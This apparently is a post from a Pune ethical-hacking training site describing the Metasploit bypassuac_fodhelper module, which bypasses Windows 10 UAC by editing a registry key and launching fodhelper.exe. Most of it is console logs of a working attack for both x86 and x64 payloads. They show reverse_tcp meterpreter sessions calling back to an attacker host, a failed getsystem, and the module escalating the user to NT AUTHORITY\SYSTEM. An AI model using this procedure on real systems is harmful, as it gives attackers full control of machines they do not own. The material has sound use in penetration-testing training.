Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credit: Christian
This module exploit a recently disclosed bypassuac method on windows 10 that is currently unpatched.
By editing a registry key and launching fodhelper.exe autoelevated process, one can get an elevated meterpreter session without dropping any file.
This technique is highly similar to the bypassuac_eventvwr module.
Windows 10×64 With x86 payload
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49422) at 2017-06-01 10:05:04 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options
Module options (exploit/windows/local/bypassuac_fodhelper):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 10×64 with x64 payload
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49424) at 2017-06-01 10:07:48 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuyid
[-] Unknown command: getuyid.
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India